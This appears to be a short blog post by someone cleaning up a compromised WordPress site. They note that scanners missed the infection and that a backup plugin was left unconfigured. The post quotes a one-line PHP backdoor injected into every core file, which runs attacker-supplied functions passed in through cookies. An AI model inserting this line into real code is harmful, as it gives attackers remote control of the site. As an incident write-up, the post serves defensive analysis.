So this new hit me pretty hard today. Normal WordPress hack I go through the plugins, see what’s infected, and work my way out. This time? Nope. Heck, even Google’s Safe Browsing Site Status came back as “Not Dangerous”. Online scanners came back clean, and was beginning to question what was what when, lo and behold in the Google SERP: This site may be hacked.
Something was amiss. The plugin CodeGuard was installed and activated. From their service: “When a change is detected, we will alert you and take a new backup of your database and site content.” There are a lot of backups in the site, and I wondered if the site owner was ever notified, or even cared. Upon closer inspection the API for the service was not set.
All files were touched by the hack, the line:
if (isset($_COOKIE[“id”])) @$_COOKIE[“user”]($_COOKIE[“id”]);
added to each core file. index.php, .htaccess and file in root called post.php where altered/added respectively. Because of their size I put them up on github at: https://github.com/michalsen/hacked_files
Yep, this server was rooted.